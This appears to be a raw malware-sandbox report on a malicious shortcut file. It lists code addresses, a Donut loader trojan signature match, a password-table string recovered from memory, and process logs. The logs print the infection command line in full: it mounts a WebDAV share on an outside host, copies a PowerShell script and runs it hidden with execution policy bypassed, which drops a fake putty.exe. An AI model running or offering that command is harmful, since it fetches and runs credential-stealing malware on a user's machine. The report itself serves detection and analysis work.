Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB10EBEEA8	11_2_00007FFB10EBEEA8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB10EBC6A0	11_2_00007FFB10EBC6A0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB10EB2038	11_2_00007FFB10EB2038
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB10EB2028	11_2_00007FFB10EB2028
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB11150DF8	11_2_00007FFB11150DF8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB1115129C	11_2_00007FFB1115129C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB112B4DAD	11_2_00007FFB112B4DAD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB112BAE2D	11_2_00007FFB112BAE2D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB112BB8BD	11_2_00007FFB112BB8BD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB112BC8AF	11_2_00007FFB112BC8AF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB112B6155	11_2_00007FFB112B6155
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB112B6552	11_2_00007FFB112B6552
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB112B212D	11_2_00007FFB112B212D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB112BD12D	11_2_00007FFB112BD12D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB112BA92D	11_2_00007FFB112BA92D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB112B2999	11_2_00007FFB112B2999
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB112B2D99	11_2_00007FFB112B2D99
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB112B9182	11_2_00007FFB112B9182
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB112B5571	11_2_00007FFB112B5571
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB112B9FD9	11_2_00007FFB112B9FD9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB112BABAD	11_2_00007FFB112BABAD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB112B8018	11_2_00007FFB112B8018
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB112B4841	11_2_00007FFB112B4841
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB112BA42D	11_2_00007FFB112BA42D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB112B247D	11_2_00007FFB112B247D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB112BB078	11_2_00007FFB112BB078
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB112B8C6D	11_2_00007FFB112B8C6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB112BCECD	11_2_00007FFB112BCECD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB112BB6AD	11_2_00007FFB112BB6AD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB112B32A2	11_2_00007FFB112B32A2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB112B830D	11_2_00007FFB112B830D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB112BC705	11_2_00007FFB112BC705
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB112B86FD	11_2_00007FFB112B86FD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB112B4AF9	11_2_00007FFB112B4AF9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB112BA6ED	11_2_00007FFB112BA6ED
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB112C3B4D	11_2_00007FFB112C3B4D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB112C4B47	11_2_00007FFB112C4B47
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB112B9721	11_2_00007FFB112B9721
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB112B9B79	11_2_00007FFB112B9B79
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB112BB36D	11_2_00007FFB112BB36D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB11505623	11_2_00007FFB11505623
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB11518250	11_2_00007FFB11518250
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB11507AE0	11_2_00007FFB11507AE0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB115005BE	11_2_00007FFB115005BE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB11679C67	11_2_00007FFB11679C67
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB11671065	11_2_00007FFB11671065
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB11678118	11_2_00007FFB11678118
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB118E04B8	11_2_00007FFB118E04B8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB118D8BC6	11_2_00007FFB118D8BC6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB118D000A	11_2_00007FFB118D000A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 11_2_00007FFB112BE201	11_2_00007FFB112BE201
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_00327350	13_2_00327350
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_00327CA0	13_2_00327CA0
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_0033C001	13_2_0033C001
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_003CD07C	13_2_003CD07C
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_00325870	13_2_00325870
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_003430A0	13_2_003430A0
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_00335090	13_2_00335090
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_0032B080	13_2_0032B080
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_003BB0D0	13_2_003BB0D0
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_00334970	13_2_00334970
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_00330160	13_2_00330160
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_00327A20	13_2_00327A20
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_0032EA60	13_2_0032EA60
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_0034BA40	13_2_0034BA40
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_00352A80	13_2_00352A80
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_00327B00	13_2_00327B00
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_00329BD0	13_2_00329BD0
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_00344C20	13_2_00344C20
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_00327410	13_2_00327410
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_00333440	13_2_00333440
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_003284B0	13_2_003284B0
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_00327480	13_2_00327480
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_003274E0	13_2_003274E0
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_0033B580	13_2_0033B580
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_0034B580	13_2_0034B580
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_0033CE20	13_2_0033CE20
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_003D4E89	13_2_003D4E89
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_00327710	13_2_00327710
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_00328780	13_2_00328780
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028C164D	13_2_028C164D
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_02870B4B	13_2_02870B4B
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028782B5	13_2_028782B5
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028762D5	13_2_028762D5
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028A12D5	13_2_028A12D5
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_0287B255	13_2_0287B255
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028B0305	13_2_028B0305
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028AA315	13_2_028AA315
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_0289E328	13_2_0289E328
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028AC325	13_2_028AC325
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028BE355	13_2_028BE355
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_0289E08A	13_2_0289E08A
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028880AB	13_2_028880AB
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028840F8	13_2_028840F8
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_02890065	13_2_02890065
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_0287F19E	13_2_0287F19E
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028A3195	13_2_028A3195
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_0287B6B5	13_2_0287B6B5
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_0289A6E5	13_2_0289A6E5
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028A86F5	13_2_028A86F5
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_0288C615	13_2_0288C615
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028AC665	13_2_028AC665
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_0287A7F5	13_2_0287A7F5
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_02878745	13_2_02878745
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028A8495	13_2_028A8495
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028A74FE	13_2_028A74FE
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_02884425	13_2_02884425
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_02898465	13_2_02898465
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_02890475	13_2_02890475
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028705B7	13_2_028705B7
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028945E5	13_2_028945E5
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028B05F5	13_2_028B05F5
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_02879525	13_2_02879525
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_0289B545	13_2_0289B545
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_0288AA8D	13_2_0288AA8D
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_02892A81	13_2_02892A81
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_0287CAB5	13_2_0287CAB5
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_0289DA19	13_2_0289DA19
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_0289EA18	13_2_0289EA18
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_0289DA1E	13_2_0289DA1E
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_02890A35	13_2_02890A35
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_02886B87	13_2_02886B87
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028A9BE5	13_2_028A9BE5
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028AEB26	13_2_028AEB26
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028BDB4D	13_2_028BDB4D
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_02899B5D	13_2_02899B5D
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_0288D885	13_2_0288D885
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_0289A8C1	13_2_0289A8C1
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028B08F5	13_2_028B08F5
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_0289E989	13_2_0289E989
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028939A5	13_2_028939A5
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028779C5	13_2_028779C5
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_02875925	13_2_02875925
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_0288396C	13_2_0288396C
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_02882EDD	13_2_02882EDD
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_0289EE55	13_2_0289EE55
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_02874F15	13_2_02874F15
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_02877F15	13_2_02877F15
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028BDF1D	13_2_028BDF1D
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028ABF15	13_2_028ABF15
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_0288AF17	13_2_0288AF17
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028A8F65	13_2_028A8F65
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_02891CFC	13_2_02891CFC
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028A8C25	13_2_028A8C25
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028B0C35	13_2_028B0C35
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_02880C36	13_2_02880C36
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028BCC59	13_2_028BCC59
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_02888C52	13_2_02888C52
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_02876C65	13_2_02876C65
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_028BEDF5	13_2_028BEDF5
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_0287FD15	13_2_0287FD15
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: 13_2_0288FD75	13_2_0288FD75

Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: String function: 00344000 appears 72 times
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: String function: 003B7968 appears 56 times
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: String function: 0287A045 appears 74 times
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: String function: 02886B65 appears 69 times
Source: C:\Users\user\AppData\Local\Temp\putty.exe	Code function: String function: 00344150 appears 113 times

Source: 0000000D.00000002.2000458506.0000000002870000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: classification engine

Classification label: mal100.troj.spyw.evad.winLNK@11/5@7/2

Source: C:\Users\user\AppData\Local\Temp\putty.exe

Code function: 13_2_0287125B CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,

13_2_0287125B

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\user\Documents\adv.ps1

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\putty.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6728:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ivvrssih.kvp.ps1

Jump to behavior

Source: C:\Windows\System32\conhost.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\net.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: putty.exe, 0000000D.00000003.1844512933.0000000003A15000.00000004.00000800.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1874112150.0000000003A3A000.00000004.00000800.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1873955412.0000000003A45000.00000004.00000800.00020000.00000000.sdmp, putty.exe, 0000000D.00000003.1844074575.0000000003A44000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: unknown	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c net use Z: \\todmeng.com@SSL\webdav\ && copy Z:\adv.ps1 C:\Users\user\Documents\adv.ps1 /y && start powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\user\Documents\adv.ps1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net use Z: \\todmeng.com@SSL\webdav\
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\user\Documents\adv.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\putty.exe "C:\Users\user\AppData\Local\Temp\putty.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net.exe "C:\Windows\system32\net.exe" use Z: /delete
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net use Z: \\todmeng.com@SSL\webdav\	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\user\Documents\adv.ps1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\putty.exe "C:\Users\user\AppData\Local\Temp\putty.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\net.exe "C:\Windows\system32\net.exe" use Z: /delete	Jump to behavior

Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: drprov.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: ntlanman.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: davclnt.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: davhlpr.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: drprov.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntlanman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: davclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: davhlpr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
